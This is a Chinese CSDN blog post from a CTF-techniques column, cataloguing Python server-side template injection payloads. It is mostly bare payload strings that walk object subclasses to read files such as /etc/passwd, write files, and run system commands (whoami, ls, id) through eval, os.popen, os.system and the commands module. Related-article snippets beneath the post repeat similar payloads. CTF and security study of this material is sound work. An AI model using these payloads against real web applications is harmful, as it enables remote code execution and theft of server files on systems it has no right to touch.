SSTI(模板注入)漏洞利用

最新推荐文章于 2024-07-26 17:38:00 发布
最新推荐文章于 2024-07-26 17:38:00 发布
阅读量645 收藏 7
点赞数 2
分类专栏: ctf技术 文章标签: python web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/118757260
版权
这篇博客介绍了Python中四种不同的文件读取方法,包括利用.index()、file类、_frozen_importlib_external.FileLoader类和通过函数解析的方式。同时,文章详细阐述了三种命令执行的实现方式,分别利用eval、warnings.catch_warnings以及commands模块。这些技术深入探讨了Python对文件操作和系统命令的底层使用。
摘要由CSDN通过智能技术生成

读写文件

读文件:

方法一
利用.index()模块

''.__class__.__mro__[2].__subclasses__().index(file)

方法二:

flie类:(在字符串的所属对象种获取str的父类,在其object父类种查找其所有子类,第41个为file类)

''.__class__.__mro__[2].__subclasses__()[40]('<File_To_Read>').read()

方法三:
字模块利用
_frozen_importlib_external.FileLoader类:(前置查询一样,第91个类)

''.__class__.__mro__[2].__subclasses__()[91].get_data(0,"<file_To_Read>")

方法四:
通过函数解析->基本类->基本类子类->重载类->引用->查找可用函数

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()

写文件:

方法一:

''.__class__.__mro__[2].__subclasses__()[166].__init__.__globals__['__builtins__']['file']('/etc/passwd').write()

存在的子模块可以通过 .index() 来进行查询,如果存在的话返回索引,直接调用即可。

方法二:

[].__class__.__base__.__subclasses__()[40]('/etc/passwd').write()

命令执行

第一类

利用eval 进行命令执行。

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')

第二类

利用warnings.catch_warnings 进行命令执行

首先,查看 warnings.catch_warnings 方法的位置:

[].__class__.__base__.__subclasses__().index(warnings.catch_warnings)

查看 linecatch 的位置:

[].__class__.__base__.__subclasses__()[59].__init__.__globals__.keys().index('linecache')

查找 os 模块的位置:

[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.keys().index('os')

查找 system 方法的位置:

[].__class__.__base__.__subclasses__()[166].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.keys().index('system')

调用 system 方法:

[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')

第三类

利用 commands 进行命令执行。

1.利用getstatusoutput模块

{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')

2.利用system模块

{}.__class__.__bases__[0].__subclasses__()[166].__init__.__globals__['__builtins__']['__import__']('os').system('ls')

3.利用popen模块

{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
C1yas0
关注
专栏目录
【网络安全 | 1.5w字总结】SSTI漏洞入门
等风来
08-24 9257
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
【网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析
等风来
05-28 5633
2.命令执行注入:攻击者在应用程序中的命令执行语句注入模板代码,从而执行任意系统命令,获取系统权限,对系统进行攻击等。3.变量渲染注入:攻击者在应用程序中的变量渲染语句注入模板代码,从而影响页面的输出,导致代码执行或信息泄漏等问题。在 Python 3 中,当对一个未导入的模块(如 os 模块)执行 eval() 函数时,linecache 模块会发出一个警告,可利用这个警告来读取敏感信息。1.条件语句注入:攻击者在应用程序中的条件语句注入模板代码,从而控制条件判断的分支,导致程序的逻辑错误。
SSTI漏洞详解
最新发布
apple_74953689的博客
07-26 1166
SSTI(Server-Side Template Injection)是一种发生在服务器端模板中的漏洞。当应用程序接受用户输入并将其直接传递到模板引擎中进行解析时,如果未对用户输入进行,攻击者可以通过构造来注入模板代码,导致服务器端模板引擎执行恶意代码。more常见的模板有很多,不同模板的语法也不相同,在实际情况我们可以测试判断属于哪一种模板。下面将引用一个简单的例子来说明,假设有一个包含以下代码的Twig模板文件Hello, 49!但是,如果攻击者将。
利用服务器端模板注入
weixin_26741563的博客
09-03 387
Server Side Template Injection: To present data dynamically from emails or webpages we use templates and unsafely use of it leads to server exploits like RCE and many more. 服务器端模板注入:为了从电子邮件或网页中动态显示数据,...
CTF-web-ssti模板注入漏洞
Ye的博客
04-14 1039
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。,那么页面上就会显示。
83 CTF夺旗-Python考点SSTI&反序列化&字符串
山兔的博客
02-07 1404
MISC(安全杂项):全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广。我们平时看到的社工类题目;给你一个流量包让你分析的题目;取证分析题目;都属于这类题目。主要考查参赛选手的各种基础综合知识,考察范围比较广。PPC(编程类):全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写,批量处理等,有时候用编程去处理问题,会方便的多。当然PPC相比ACM来说,还是较为容易的。
[CSCCTF 2019 Qual]FlaskLight
K1ose的博客
03-24 224
访问页面,view-source一下; 提示说有参数search,方法为GET; 既然题目有个Flask,可以试试模板注入漏洞; ?search={{7*7}} 结果返回49; 首先访问对象的继承类; {{ ''.__class__.__more__ }} 得到 选择第三个类; {{ ''.__class__.__mro__[2].__subclasses__() }} 在输出结果里面找到file类,来进行读写; {{ ''.__class__.__mro__[2].__subclasses__(
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3729
web安全-SSTI模板注入漏洞
【安全漏洞】DedeCMS-5.8.1 SSTI模板注入导致RCE
HBohan的博客
11-20 2020
漏洞类型 SSTI RCE 利用条件 影响范围应用 漏洞概述 2021年9月30日,国外安全研究人员Steven Seeley披露了最新的DedeCMS版本中存在的一处SQL注入漏洞以及一处SSTI导致的RCE漏洞,由于SQL注入漏洞利用条件极为苛刻,故这里只对该SSTI注入漏洞进行简要分析复现 漏环境搭建 【技术学习资料】 漏洞复现 这里使用phpstudy来搭建环境 网站前台:http://192.168.59.1/index.php?upcache=1 网站后台: http://192.
【Java代码审计】模板注入漏洞
大河之犬的博客
04-02 1095
模板引擎通常用于动态生成Web页面、邮件、报告等内容,它们允许开发人员在模板中插入变量、表达式或代码片段,并在生成输出时进行解析和执行模板注入漏洞通常发生在模板引擎对用户提供的输入进行不充分或不正确的验证和过滤时,导致恶意用户能够注入恶意代码并执行它们。
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1716
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
Web_python_template_injection_攻防世界
u014794949
11-06 266
提示python模板注入,7*7变成49,确定存在模板注入 {{''.__class__.__mro__[2].__subclasses__()}} 构造payload {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}} {{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}} 魔术方法 __cl
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2760
Flask SSTI漏洞介绍及利用
CTF_Web:从0学习Flask模板注入SSTI
AFCC_的博客(Web_Dog)
08-30 4586
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
SSTI漏洞基础解析
小王的储物间
02-14 532
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
模板注入总结(SSTI)
qq_44657899的博客
02-14 5555
a. 获取变量[]所属的类名 {{[].__class__}} b. 获取list所继承的基类名 {{[].__class__.__base__}} c. 获取所有继承自object的类 {{[].__class__.__base__.__subclasses__()}} 没有内置的os模块的类 目录查询 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("
python3--globals()内置函数应用
Mark的博客
01-13 471
通过以上结果基本可以得出,globals()可以拿到脚本里所有的成员信息,那么如果应用到接口自动化进行传参,直接就可以使用globals()存储和加载能力然后进行获取我们需要的内容。总结,globals()可以拿到模块里所有的变量,同时也可以往里面主动存储数据,需要使用的时候可以获取对应的数据信息。做接口自动化的时候做链路测试需要进行业务参数传递。
class.__mro__、class.mro()、class.__subclasses__()的使用举例
敲代码的小风
01-10 936
参考链接: class.__mro__ 参考链接: class.mro() 参考链接: class.__subclasses__() 实验代码展示: # class Person(): # class Person(object): # class Person: class Person: # class Person(object): # class Person: # class Person(): 这三种写法都是可以的 '''定义基类Person''' def __init__(s
python __reduce__魔法方法_关于python魔术方法payload:"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd"...
weixin_39737757的博客
11-28 248
总览"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()其实就是类似java的反射,通过一个对象找到另一个对象,这里通过一个字符串对象,找了一个文件对象,然后初始化,读取,就是这么个事。# 获得一个字符串实例>>> ""''# 获得字符串的type实例>>> "".__class__# 获得其父类>>> "".__cl...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值